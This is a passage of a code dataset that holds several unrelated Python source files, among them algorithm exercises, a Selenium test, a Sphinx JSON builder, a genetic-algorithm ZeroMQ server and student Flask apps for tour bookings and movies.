nodes while\n    # walking the sum string left to right leaves the least significant digit\n    # at the head, matching the input format\n    head = None\n    for digit in str(first + second):\n        node = LinkedList(int(digit))\n        node.next = head\n        head = node\n    return head\n","repo_name":"AsherThomasBabu/AlgoExpert","sub_path":"Linked List/Sum-of-Linked-Lists/naive.py","file_name":"naive.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"19811170822","text":"#!/usr/bin/env python3\n##!/usr/bin/python3\n##!/share/apps/python-3.4.3/bin/python3.4\n\n\"\"\"\n./main.py tournament\n\nThis program creates a round robin football tournament and prints the\ncurrent state of the groups.\n\nParameters\n----------\ntournament: str\n    The name of the tournament.\n\nReturns\n-------\nprint on screen:\n    Current state of the groups.\n\nExamples\n--------\n./main.py ElFutbolazo\n\n\"\"\"\nimport sys\nfrom Team import Team\nfrom Tournament import Tournament\nfrom TournamentGroup import Group\nfrom read_input import read_input\n\nif __name__ == \"__main__\":\n    #Reads the name of the tournament from prompt\n    if len(sys.argv) != 2: sys.exit('### ERROR: Choose a tournament')\n    nfile = sys.argv[1]\n\n    #Reads the tournament details, the groups and the teams from the input file\n    [teams_and_groups, file_results, ppm] = read_input(nfile)\n    allteams = []\n    allgroups = []\n    nallgroups = set([])\n    ngroup = 'NG'\n    for i in teams_and_groups:\n        if i[0:4] == '': ngroup = 'NG'\n        elif i[0:4] == '### ':\n            ngroup = i[4:]\n            nallgroups.add(ngroup)\n        else:\n            allteams.append(Team(i))\n            allteams[-1].set_group(ngroup)\n    pointspermatch = [2, 1, 0]\n    for i in sorted(nallgroups):\n        allgroups.append(Group(i, [team for team in allteams if team.group == i], ppm))\n\n    #Creates the tournament\n    tournament = Tournament(allgroups, file_results)\n    tournament.update_results()\n    tournament.print_groups()\n","repo_name":"rlugones/tournaments_football","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6902691968","text":"class Solution:\n    \"\"\"\n    @param nums: a sorted array\n    @param a: \n    @param b: \n    @param c: \n    @return: a sorted array\n    \"\"\"\n    def transform(self,i,a,b,c):\n        return a*i*i+b*i+c\n    def sortTransformedArray(self, nums, a, b, c):\n        # Write your code here
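        # f(x) = a*x^2 + b*x + c over the sorted nums is convex when a > 0\n        # (largest values at the two ends) and concave/linear otherwise\n        # (smallest values at the two ends), so two pointers moving inward\n        # from both ends fill the result array in a single O(n) pass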
        res=[0]*len(nums)\n        if a>0:\n            index=len(nums)-1\n            i=0\n            j=index\n            while i<=j:\n                ires=self.transform(nums[i],a,b,c)\n                jres=self.transform(nums[j],a,b,c)\n                if ires>jres:\n                    res[index]=ires\n                    i+=1\n                else:\n                    res[index]=jres\n                    j-=1\n                index-=1\n        else:\n            index=0\n            i=0\n            j=len(nums)-1\n            while i<=j:\n                ires=self.transform(nums[i],a,b,c)\n                jres=self.transform(nums[j],a,b,c)\n                if ires>jres:\n                    res[index]=jres\n                    j-=1\n                else:\n                    res[index]=ires\n                    i+=1\n                index+=1\n        return res\n\n\n    \n","repo_name":"Wanlingj/LeetCode","sub_path":"Google/Sorting and searching/Sort Transformed Array.py","file_name":"Sort Transformed Array.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40373396387","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom utils import copy_to_clipboard\n\n\n@copy_to_clipboard\ndef part1(recipe_count, take=10):\n    stop_count = recipe_count + take\n    return get_scores(stop_count=stop_count)[recipe_count:stop_count]\n\n\n@copy_to_clipboard\ndef part2(digits):\n    return get_scores(digits=digits).index(digits)\n\n\ndef get_scores(**kwargs):\n    scores = '37'\n    elf1, elf2 = 0, 1\n    count = len(scores)\n    stop_count = kwargs.get('stop_count', 0)\n    digits = kwargs.get('digits', '')\n    tail = -len(digits) - 1\n    while True:\n        s1, s2 = int(scores[elf1]), int(scores[elf2])\n        recipe = str(s1 + s2)\n        scores += recipe\n        count += len(recipe)\n        elf1 = (elf1 + 1 + s1) % count\n        elf2 = (elf2 + 1 + s2) % count\n        if stop_count and count >= stop_count:\n            break\n        if digits and digits in scores[tail:]:\n            break\n    return scores\n\n\ndef main():\n    assert part1(5) == '0124515891'\n    assert part1(9) == '5158916779'\n    assert part1(18) == '9251071085'\n    assert part1(320851) == '7116398711'\n\n    assert part2('01245') == 5\n    assert part2('51589') == 9\n    assert part2('92510') == 18\n    assert part2('59414') == 2018\n    assert part2('320851') == 20316365\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"slicklash/aoc","sub_path":"2018/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9605625494","text":"# encoding=utf-8\nimport unittest\nfrom HTMLTestRunner import HTMLTestRunner\nfrom selenium import webdriver\n\nclass Youdao(unittest.TestCase):\n\n    def setUp(self):\n        # self.driver = webdriver.Firefox()\n        self.driver = webdriver.Chrome()\n        # self.driver.implicitly_wait(10)\n        self.base_url='http://www.youdao.com/'\n\n\n    def test_youdao(self):\n        driver = self.driver\n        driver.get(self.base_url)\n        driver.find_element_by_id(\"translateContent\").send_keys(\"http test0827.txt runner\")\n        driver.find_element_by_id(\"translateContent\").submit()\n\n    def tearDown(self):\n        pass\n\nif __name__=='__main__':\n\n    testsuite = unittest.TestSuite()\n    testsuite.addTest(Youdao('test_youdao'))\n    # Define the path for the report file\n    fp = open('result.html','wb')\n    runner = HTMLTestRunner(stream=fp,\n                            title='有道翻译测试报告',\n                            description='用例执行情况')\n    runner.run(testsuite)\n    fp.close()","repo_name":"xiaoloinzi/worksplace","sub_path":"GR1/selenuim/unittest/test_youdao_htmltestrunner.py","file_name":"test_youdao_htmltestrunner.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73994591843","text":"from flask import Blueprint, request\nfrom init import db\nfrom models.tour import Tour\nfrom models.tour_booking import 
TourBooking, tour_booking_schema\nfrom models.user import User\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom controllers.decorator import authorise_as_tourist, admin_user_ID\nfrom sqlalchemy.sql import and_\n\ntour_bookings_bp=Blueprint('tour_bookings', __name__)\n\n# Tour booking route for viewing a tour booking - tour booking owner and tour owner only\n@tour_bookings_bp.route('/<int:booking_id>')\n@jwt_required()\ndef get_one_tourbooking(tour_id, booking_id):\n\n    # Find the tour with id=tour_id\n    tour_stmt = db.select(Tour).filter_by(id=tour_id)\n    tour = db.session.scalar(tour_stmt)\n\n    # Find the booking that links to the tour, matching it with booking_id \n    booking_stmt = db.select(TourBooking).join(Tour).filter(and_(TourBooking.id==booking_id, Tour.id==tour_id))\n    tour_booking = db.session.scalar(booking_stmt)\n    \n    # If the tour and related tour booking exist\n    # Only the tourist and tour guide involved in this tour booking can view the booking\n    if tour and tour_booking:\n        if str(tour_booking.user_id) == get_jwt_identity() or str(tour.user_id) == get_jwt_identity():\n\n            # If no conflicts with authorised users,\n            # and the tour has matching booking with id=booking id, return the booking in the response\n            return tour_booking_schema.dump(tour_booking)\n        \n        # If unauthorised users, return the error message\n        else:\n            return {'error': 'Only the tourist and tour guide relating to this tour booking can view.'}, 403\n    \n    # If the tour and related tour booking do not exist, return the error message\n    else: \n        return {'error' : f'Tour not found with id {tour_id} or Tour booking not found with id {booking_id}.'}, 404\n\n\n# Tour booking route for creating a tour booking - tourist only\n@tour_bookings_bp.route('/', methods=['POST'])\n@jwt_required()\n@authorise_as_tourist\ndef create_tourbooking(tour_id):\n    # Load booking data from the request using schema to include data validation\n    body_data = tour_booking_schema.load(request.get_json())\n\n    # Find the tour with id=tour_id\n    tour_stmt = db.select(Tour).filter_by(id=tour_id)\n    tour = db.session.scalar(tour_stmt)\n\n    # Check the user who is currently logged in \n    # and match with user who has a current booking linked to the tour with id=tour_id\n    current_user_id = get_jwt_identity()\n    user_stmt = db.select(User).join(TourBooking).join(Tour).filter(and_(TourBooking.user_id==current_user_id, Tour.id==tour_id))\n    user = db.session.scalar(user_stmt)\n\n    # If the tour exists and is available\n    if tour and tour.is_available == True:\n\n        # Preventing booking duplicates by checking\n        # if the current user already had a booking linked to the tour, return the error message\n        if user:\n            return {'error' : f'You have existing booking with tour of id {tour_id}.'}, 409\n        \n        # If no existing booking, create a new Booking model instance with data passed in from the request\n        tour_booking = TourBooking(\n            tourist_number=body_data.get('tourist_number'),\n            preferred_language=body_data.get('preferred_language'),\n            extra_request=body_data.get('extra_request'),\n            user_id = get_jwt_identity(),\n            tour=tour \n        )\n\n        # Add and commit new booking to the database\n        db.session.add(tour_booking)\n        db.session.commit()\n\n        # Return the new booking in the response\n        return tour_booking_schema.dump(tour_booking), 201\n    \n    # If tour does not exist or unavailable, return the error message\n    else:\n        return {'error' : f'Tour not found with id {tour_id}.'}, 404\n\n
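# A hypothetical request against the create route above, assuming the\n# blueprint is registered under a url_prefix like '/tours/<int:tour_id>/bookings':\n#   POST /tours/1/bookings\n#   {'tourist_number': 2, 'preferred_language': 'English', 'extra_request': ''}\n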
\n# Tour booking route for updating a tour booking - tour booking owner only\n@tour_bookings_bp.route('/<int:booking_id>', methods=['PUT', 'PATCH'])\n@jwt_required()\ndef update_one_booking(tour_id, booking_id):\n    # Load booking data from the request using schema to include data validation\n    body_data = tour_booking_schema.load(request.get_json(), partial=True)\n\n    # Find the tour with id=tour_id\n    tour_stmt = db.select(Tour).filter_by(id=tour_id)\n    tour = db.session.scalar(tour_stmt)\n\n    # Find the booking that links to the tour, matching it with booking_id \n    booking_stmt = db.select(TourBooking).join(Tour).filter(and_(TourBooking.id==booking_id, Tour.id==tour_id))\n    tour_booking = db.session.scalar(booking_stmt)\n\n    # If the tour and related tour booking exist\n    if tour and tour_booking:\n        # Check if the user who is currently logged in is the booking owner\n        if str(tour_booking.user_id) != get_jwt_identity():\n            # If not, return the error message\n            return {'error': 'Only the owner of the tour booking can edit.'}, 403\n        \n        # If it is the booking owner, update the database with the new data from the request\n        tour_booking.tourist_number=body_data.get('tourist_number') or tour_booking.tourist_number\n        tour_booking.preferred_language=body_data.get('preferred_language') or tour_booking.preferred_language\n        tour_booking.extra_request=body_data.get('extra_request') or tour_booking.extra_request\n\n        # Commit to the database\n        db.session.commit()\n        # Return the updated booking in the response\n        return tour_booking_schema.dump(tour_booking)\n    \n    # If the tour has no matching tour booking with id=booking_id, return the error message\n    else:\n        return {'error' : f'Tour not found with id {tour_id} or Tour booking not found with id {booking_id}.'}, 404\n\n# Tour booking route for deleting a tour booking - tourist only\n@tour_bookings_bp.route('/<int:booking_id>', methods=['DELETE'])\n@jwt_required()\ndef delete_one_booking(tour_id, booking_id):\n\n    # Find the tour with id=tour_id\n    tour_stmt = db.select(Tour).filter_by(id=tour_id)\n    tour = db.session.scalar(tour_stmt)\n\n    # Find the booking that links to the tour, matching it with booking_id \n    booking_stmt = db.select(TourBooking).join(Tour).filter(and_(TourBooking.id==booking_id, Tour.id==tour_id))\n    tour_booking = db.session.scalar(booking_stmt)\n\n    # If the tour and related tour booking exist\n    if tour and tour_booking:\n\n        # Check if the user who is currently logged in is the booking owner or admin user\n        if str(tour_booking.user_id) == get_jwt_identity() or get_jwt_identity() == admin_user_ID():\n            # If yes, delete the booking and commit to database\n            db.session.delete(tour_booking)\n            db.session.commit()\n            return {'message' : f'Tour booking {tour_booking.id} deleted successfully.'}\n        # If not, return the error message\n        else:\n            return {'error': 'Only the owner of the tour booking can delete.'}, 403\n\n    # If the tour has no matching tour booking with id=booking_id, return the error message\n    else:\n        return {'error' : f'Tour not found with id {tour_id} or Tour booking not found with id {booking_id}.'}, 404","repo_name":"ellenpham/API-Webserver-LocalTourBooking","sub_path":"src/controllers/tourbooking_controller.py","file_name":"tourbooking_controller.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73143207523","text":"from SisEqLin import SistemaEquacoes\n\n\n# Main\nmat2 = SistemaEquacoes(2)\nmat3 = SistemaEquacoes(3)\nmat4 = SistemaEquacoes(4)\nmat5 = SistemaEquacoes(5)\nmat6 = SistemaEquacoes(6)\nmat7 = SistemaEquacoes(7)\nmat8 = SistemaEquacoes(8)\nmat9 = 
SistemaEquacoes(9)\nmat10 = SistemaEquacoes(10)\nmat11 = SistemaEquacoes(11)\nmat12 = SistemaEquacoes(12)\nmat13 = SistemaEquacoes(13)\nmat14 = SistemaEquacoes(14)\nmat15 = SistemaEquacoes(15)\n","repo_name":"carlospadilha007/TrabalhoMC2","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"sq","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3686571138","text":"# -*- coding: utf-8 -*-\n\nimport urllib.parse\n\nfrom docutils import nodes\nfrom sphinx import addnodes\nfrom sphinx.builders.html import JSONHTMLBuilder\nfrom sphinx.util import jsonimpl\nfrom sphinx.util.osutil import relative_uri\nfrom .common import init_builder, derive_content_id\nfrom .envelope import Envelope\n\n\nTOC_DOCNAME = '_toc'\n\nclass DeconstSerialJSONBuilder(JSONHTMLBuilder):\n    \"\"\"\n    Custom Sphinx builder that generates Deconst-compatible JSON documents.\n    \"\"\"\n\n    implementation = jsonimpl\n    name = 'deconst'\n    out_suffix = '.json'\n\n    def init(self):\n        super().init()\n        init_builder(self)\n\n        self.toc_envelope = None\n\n    def prepare_writing(self, docnames):\n        \"\"\"\n        Emit the global TOC envelope for this content repository.\n        \"\"\"\n\n        super().prepare_writing(docnames)\n\n        self.toc_envelope = self._toc_envelope()\n        if self.toc_envelope:\n            self.dump_context(self.toc_envelope.serialization_payload(),\n                              self.toc_envelope.serialization_path())\n\n    def handle_page(self, pagename, context, **kwargs):\n        \"\"\"\n        Override to call write_context.\n        \"\"\"\n\n        context['current_page_name'] = pagename\n        self.add_sidebars(pagename, context)\n        self.write_context(context)\n\n    def finish(self):\n        \"\"\"\n        We need to write images and static assets *first*.\n\n        Also, the search indices and so on aren't necessary.\n        \"\"\"\n\n    def write_context(self, context):\n        \"\"\"\n        Override the default serialization code to save a derived metadata\n        envelope, instead.\n        \"\"\"\n\n        docname = context['current_page_name']\n        per_page_meta = self.env.metadata[docname]\n\n        local_toc = None\n        if context['display_toc']:\n            local_toc = context['toc']\n\n        envelope = Envelope(docname=docname,\n                            body=context['body'],\n                            title=context['title'],\n                            toc=local_toc,\n                            builder=self,\n                            deconst_config=self.deconst_config,\n                            per_page_meta=per_page_meta,\n                            docwriter=self.docwriter)\n\n        # Omit the TOC envelope. It's handled in prepare_writing().\n        if self.toc_envelope and envelope.content_id == self.toc_envelope.content_id:\n            return\n\n        envelope.set_next(context.get('next'))\n        envelope.set_previous(context.get('prev'))\n\n        # If this repository has a TOC, reference it as an addenda.\n        if self.toc_envelope:\n            envelope.add_addenda('repository_toc', self.toc_envelope.content_id)\n\n        self.dump_context(envelope.serialization_payload(),\n                          envelope.serialization_path())\n\n    def _toc_envelope(self):\n        \"\"\"\n        Generate an envelope containing the TOC for this content repository.\n\n        If the repository contains a document named \"_toc.rst\", render its\n        entire doctree as the TOC envelope's body. Otherwise, extract the\n        toctree from the repository's master document (usually \"index.rst\"),\n        ignore any :hidden: directive arguments, and render it alone.\n\n        URLs within the TOC are replaced with \"{{ to('<content-id>') }}\"\n        expressions. 
At page presentation time, these are replaced with the\n        presented URL of the named envelope based on that envelope's current\n        mapping.\n        \"\"\"\n\n        if '_toc' in self.env.found_docs:\n            docname = '_toc'\n            full_render = True\n            includehidden = False\n        else:\n            docname = self.config.master_doc\n            full_render = False\n            includehidden = True\n\n        doctree = self.env.get_doctree(docname)\n\n        # Identify toctree nodes from the chosen document\n        toctrees = []\n        for toctreenode in doctree.traverse(addnodes.toctree):\n            toctree = self.env.resolve_toctree(self.config.master_doc, self, toctreenode,\n                                               prune=True,\n                                               includehidden=includehidden,\n                                               maxdepth=0)\n\n            # Rewrite refuris from this resolved toctree\n            for refnode in toctree.traverse(nodes.reference):\n                if 'refuri' not in refnode:\n                    continue\n\n                refstr = refnode['refuri']\n                parts = urllib.parse.urlparse(refstr)\n\n                if parts.scheme or parts.netloc:\n                    # Absolute URL\n                    continue\n\n                target = \"{{ to('\" + derive_content_id(self.deconst_config, parts.path) + \"') }}\"\n                if parts.fragment:\n                    target += '#' + parts.fragment\n\n                refnode['refuri'] = target\n\n            toctreenode.replace_self(toctree)\n\n            toctrees.append(toctree)\n\n        # No toctree found.\n        if not toctrees:\n            return None\n\n        # Consolidate multiple toctrees\n        toctree = toctrees[0]\n        for t in toctrees[1:]:\n            toctree.extend(t.children)\n\n        # Render either the toctree alone, or the full doctree\n        if full_render:\n            self.secnumbers = self.env.toc_secnumbers.get(docname, {})\n            self.fignumbers = self.env.toc_fignumbers.get(docname, {})\n            self.imgpath = relative_uri(self.get_target_uri(docname), '_images')\n            self.dlpath = relative_uri(self.get_target_uri(docname), '_downloads')\n            self.current_docname = docname\n\n            rendered_toc = self.render_partial(doctree)['body']\n        else:\n            # Include the wrapper (toctree.parent) for consistent markup.\n            rendered_toc = self.render_partial(toctree.parent)['body']\n\n        return Envelope(docname=TOC_DOCNAME,\n                        body=rendered_toc,\n                        title=None,\n                        toc=None,\n                        builder=self,\n                        deconst_config=self.deconst_config,\n                        per_page_meta={'deconstunsearchable': True},\n                        docwriter=self._publisher.writer)\n","repo_name":"deconst/preparer-sphinx","sub_path":"deconstrst/builders/serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"35555079147","text":"# __author__ = \"Priyanka Shanmugasundaram (pshanmu)\"\r\n# note: most of this code is modified from lecture\r\nimport os\r\nfrom flask import Flask, render_template, session, redirect, url_for, request# tools that will make it easier to build on things\r\nfrom flask_sqlalchemy import SQLAlchemy # handles database stuff for us - need to pip install flask_sqlalchemy in your virtual env, environment, etc to use this and run this\r\nimport seaborn as sns\r\nfrom flask_wtf import Form\r\nfrom wtforms import StringField, DecimalField, SubmitField, FloatField\r\nfrom wtforms.validators import InputRequired\r\nfrom wtforms_alchemy import ModelForm\r\nimport requests\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport io\r\nimport base64\r\n\r\n# Application configurations\r\napp = Flask(__name__)\r\napp.debug = True\r\napp.use_reloader = True\r\napp.config['SECRET_KEY'] = '05201996'\r\n\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///./movies.db' # TODO: decide what your new database name will be -- that has to go here\r\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\n\r\n\r\n# Set up Flask debug stuff\r\ndb = SQLAlchemy(app) # For database use\r\nsession = db.session # to make queries easy\r\n\r\n\r\n\r\n#########\r\n######### Everything above this line is important/useful setup, not problem-solving.\r\n#########\r\n\r\n\r\n##### Set up Models #####\r\n\r\n# Set up association Table if you wanted many to many relationship:\r\ncollections = db.Table('collections',db.Column('genre_id',db.Integer, db.ForeignKey('genres.id')),db.Column('director_id',db.Integer, db.ForeignKey('directors.id')))\r\n\r\nclass Genre(db.Model):\r\n    __tablename__ = \"genres\"\r\n    id = db.Column(db.Integer, primary_key=True)\r\n    name = db.Column(db.String(64))\r\n    directors = db.relationship('Director',secondary=collections,backref=db.backref('genres',lazy='dynamic'),lazy='dynamic')\r\n    #directors = db.relationship('Director', backref = 'Genre')\r\n    movies = db.relationship('Movie',backref='Genre')\r\n\r\n\r\nclass Director(db.Model):\r\n    __tablename__ = \"directors\"\r\n    id = db.Column(db.Integer, primary_key=True)\r\n    name = db.Column(db.String(64))\r\n    movies = db.relationship('Movie',backref='Director')\r\n\r\n    def __repr__(self):\r\n        return \"{} (ID: {})\".format(self.name,self.id)\r\n\r\n\r\nclass Movie(db.Model):\r\n    id = db.Column(db.Integer, primary_key=True)\r\n    title = db.Column(db.String(64)) # unique=True, Only unique title songs can exist in this data model\r\n    genre = db.Column(db.Integer, db.ForeignKey(\"genres.id\")) #ok to be null for now\r\n    director_id = db.Column(db.Integer, db.ForeignKey(\"directors.id\")) # ok to be null for now\r\n    #genre = db.Column(db.String(64)) # ok to be null\r\n    imdb_rating = db.Column(db.Float)\r\n\r\n\r\n    def __repr__(self):\r\n        return \"{} by {} | {}\".format(self.title, self.director_id, self.genre)\r\n
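\r\n# e.g. with the 'collections' association table above, the many-to-many\r\n# relation is reachable from both sides: some_genre.directors and\r\n# some_director.genres (variable names here are illustrative)\r\n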
\r\n##### Form for Final Project####\r\n\r\nclass UpdateForm(Form):\r\n    title = StringField('title', validators = [InputRequired()])\r\n    director = StringField('director', validators = [InputRequired()])\r\n    genre = StringField('genre', validators = [InputRequired()])\r\n    imdb_rating = FloatField('imdb_rating', validators = [InputRequired()])\r\n    submit = SubmitField('Submit')\r\n\r\n##### Helper functions #####\r\n\r\n### For database additions\r\n### Relying on global session variable above existing\r\n\r\ndef get_or_create_director(director_name):\r\n    director = Director.query.filter_by(name=director_name).first()\r\n    if director:\r\n        return director\r\n    else:\r\n        director = Director(name=director_name)\r\n        session.add(director)\r\n        session.commit()\r\n        return director\r\n\r\n\r\n##### Set up Controllers (route functions) #####\r\n\r\n## Main route\r\n@app.route('/') #MODIFIED ROUTE 1 FOR FINAL PROJECT\r\ndef index():\r\n    movies = Movie.query.all()\r\n    num_movies = len(movies)\r\n    return render_template('index.html', num_movies=num_movies)\r\n\r\n@app.route('/movie/new/<title>/<genre>/<director>/<rating>') ## CHANGE FOR FINAL PROJECT (NEW ROUTE 1)\r\ndef new_movie(title, director, genre, rating):\r\n    if Movie.query.filter_by(title=title).first(): # if there is a song by that title\r\n        return \"That movie already exists! Go back to the main app!\"\r\n    else:\r\n        director = get_or_create_director(director)\r\n        movie = Movie(title=title, director_id=director.id,genre=genre, imdb_rating = rating)\r\n        session.add(movie)\r\n        session.commit()\r\n    return \"New movie: {} by {}. Check out the URL for ALL movies to see the whole list.\".format(movie.title, director.name)\r\n\r\n@app.route('/all_movies')\r\ndef all_movies():\r\n    all_movies = [] # Will be a tuple list of title, genre\r\n    movies = Movie.query.all()\r\n    for m in movies:\r\n        director = Director.query.filter_by(id=m.director_id).first() # get just one artist instance\r\n        all_movies.append((m.title,director.name, m.genre)) # get list of songs with info to easily access [not the only way to do this]\r\n    return render_template('all_movies.html',all_movies=all_movies) # check out template to see what it's doing with what we're sending!\r\n\r\n@app.route('/all_directors')\r\ndef all_directors():\r\n    directors = Director.query.all()\r\n    names = []\r\n    for d in directors:\r\n        num_movies = len(Movie.query.filter_by(director_id=d.id).all())\r\n        newtup = (d.name,num_movies)\r\n        names.append(newtup) # names will be a list of tuples\r\n    return render_template('all_directors.html',director_names=names)\r\n\r\n@app.route('/movie/new', methods=['POST', 'GET']) ## NEW ROUTE 2 FOR FINAL PROJECT\r\ndef new_movie_form(): #source: https://stackoverflow.com/questions/27367233/how-can-print-input-from-flask-wtform-to-html-with-sqlalchemy\r\n    form = UpdateForm(request.form)\r\n    movie = Movie()\r\n    #form.populate_obj(movie)\r\n    #director = get_or_create_director(director)\r\n    #movie = Movie(title=title, director_id=director.id,genre=genre, imdb_rating = imdb_rating)\r\n    #session.add(movie)\r\n    #session.commit()\r\n    director = get_or_create_director(form.director.data)\r\n    movie.title = form.title.data\r\n    movie.director_id = director.id\r\n    movie.genre = form.genre.data\r\n    movie.imdb_rating = form.imdb_rating.data\r\n    session.add(movie)\r\n    session.commit()\r\n    return render_template('form.html', form=form)\r\n\r\n@app.route('/top_movies') ## NEW ROUTE 3 FOR FINAL PROJECT\r\ndef see_top_movies():\r\n    top_movies = []\r\n    movies = Movie.query.all()\r\n    
for m in movies:\r\n director = Director.query.filter_by(id=m.director_id).first()\r\n imdb = float(m.imdb_rating)\r\n if imdb >= 8.0:\r\n top_movies.append((m.title, director.name, m.imdb_rating, m.genre))\r\n return render_template('all_movies.html', all_movies = top_movies)\r\n\r\n@app.route('/ratings/visualized')\r\ndef see_ratings():\r\n movie_ratings = []\r\n movies = Movie.query.all()\r\n for m in movies:\r\n movie_ratings.append(m.imdb_rating)\r\n img = io.BytesIO()\r\n sns.set_palette('colorblind')\r\n plt.hist(movie_ratings)\r\n plt.xlabel('Ratings')\r\n plt.title('Distribution of Ratings Among Movies in this Database')\r\n plt.savefig(img, format = 'png')\r\n img.seek(0)\r\n plot_url = base64.b64encode(img.getvalue()).decode()\r\n\r\n return '<img src=\"data:image/png;base64,{}\">'.format(plot_url)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n db.create_all() # This will create database in current directory, as set up, if it doesn't exist, but won't overwrite if you restart - so no worries about that\r\n app.run() # run with this: python main_app.py runserver\r\n","repo_name":"prishanmu/Movies_FlaskApp","sub_path":"SI507project_tools.py","file_name":"SI507project_tools.py","file_ext":"py","file_size_in_byte":7589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34730427366","text":"#\n# Binds REP socket to tcp://*:5555\n#\n\nimport time\nimport zmq\nimport sys\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport argparse\nimport json\nimport re\nfrom geneticalgorithm_mod import geneticalgorithm as ga\nimport morphologies\nfrom utils import thruster_keys_to_string\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-v', '--verbose', action='store_true', default = False,\n dest='simple_value', help='Print information when receiving data')\n\nresult = parser.parse_args()\n\ndef pairServer(train,loadfile='morph_data.json'):\n context = zmq.Context()\n global socket\n socket = context.socket(zmq.PAIR)\n socket.bind(\"tcp://*:5555\")\n print(\"python server started\")\n global Morphologies\n Morphologies = morphologies.Morphologies(train=True,nepoch=0)\n\n algorithm_param = {'max_num_iteration': 16000,\\\n 'population_size':20,\\\n 'mutation_probability':0.1,\\\n 'elit_ratio': 0.01,\\\n 'crossover_probability': 0.5,\\\n 'parents_portion': 0.3,\\\n 'crossover_type':'uniform',\\\n 'max_iteration_without_improv':None}\n\n varbound = np.array([[-1,1]]*1608)\n vartype = np.array(np.concatenate([np.array([['int']]*8),np.array([['real']]*1600)]))\n model=ga(function=ga_f,dimension=1608,variable_type_mixed=vartype,variable_boundaries=varbound,algorithm_parameters=algorithm_param,function_timeout=600)\n model.run()\n smsg = \"End\"\n socket.send(smsg.encode('utf-8'))\n Morphologies.save_to_file()\n\n\ndef ga_f(X):\n pop_s = len(X)\n #smsg = np.array2string(X,max_line_width=np.inf,threshold =2000)\n smsg = thruster_keys_to_string(X)\n socket.send(smsg.encode('utf-8'))\n objs = np.zeros(pop_s)\n for i in range(pop_s):\n rmsg = socket.recv().decode()\n key, mean, episode = handleMessage(rmsg)\n print(\"Episode %d Key %s with Val = %f\"%(episode, str(key), mean))\n for data in Morphologies.morph_data:\n if data[\"morph\"] == key:\n data[\"val_means\"].append(mean)\n data[\"episodes\"].append(episode)\n objs[i] = -mean\n return objs\n\ndef handleMessage(message):\n parts = message.split(',')\n morph = parts[0]\n mean = float(parts[1])\n episode = int(parts[2])\n key = [int(val) for val in 
re.findall(r'-?\\d+', morph)]\n    return key, mean, episode\n\ndef main():\n    start = time.time()\n    pairServer(train=False,loadfile='old_morph_datas/morph_data_pen-11.json')\n    end = time.time()\n    print(\"%f seconds\"%(end-start))\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"jdc5549/DesignControl","sub_path":"server_ga.py","file_name":"server_ga.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71894169443","text":"# Source: Programmers coding test practice, https://programmers.co.kr/learn/challenges\n# A modified version of the standard Dijkstra\n# 1. No distinction between start / end points\n# 2. Duplicate edges are allowed\n\nimport sys\n\n\ndef dijkstra(K, V, graph):\n    INF = sys.maxsize\n    s = [False] * V\n    d = [INF] * V\n    d[K - 1] = 0\n    while True:\n        m = INF\n        N = -1\n        for j in range(V):\n            if not s[j] and m > d[j]:\n                m = d[j]\n                N = j\n        if m == INF:\n            break\n        s[N] = True\n        for j in range(V):\n            if s[j]:\n                continue\n            via = d[N] + min(graph[N][j], graph[j][N])  # no start / end distinction\n            if d[j] > via:\n                d[j] = via\n    return d\n\n\ndef solution(N, road, K):\n    INF = sys.maxsize\n    graph = [[INF] * N for _ in range(N)]\n    for r in road:\n        graph[r[0] - 1][r[1] - 1] = min(r[2], graph[r[0] - 1][r[1] - 1]) # there may be duplicate roads\n    answer = 0\n    for d in dijkstra(1, N, graph):\n        if d <= K:\n            answer += 1\n    return answer\n\n# Standard Dijkstra\n# import sys\n\n\n# def dijkstra(K, V, graph):\n#     INF = sys.maxsize\n#     s = [False] * V\n#     d = [INF] * V\n#     d[K - 1] = 0\n#     while True:\n#         m = INF\n#         N = -1\n#         for j in range(V):\n#             if not s[j] and m > d[j]:\n#                 m = d[j]\n#                 N = j\n#         if m == INF:\n#             break\n#         s[N] = True\n#         for j in range(V):\n#             if s[j]: continue\n#             via = d[N] + graph[N][j] # <- one-way | two-way -> min(graph[N][j],graph[j][N])\n#             if d[j] > via:\n#                 d[j] = via\n#     return d\n\n# if __name__ == \"__main__\":\n#     V, E = map(int, input().split())\n#     K = int(input())\n#     INF = sys.maxsize\n#     graph = [[INF]*V for _ in range(V)]\n\n#     for _ in range(E):\n#         u, v, w = map(int, input().split())\n#         graph[u-1][v-1] = w # duplicates allowed 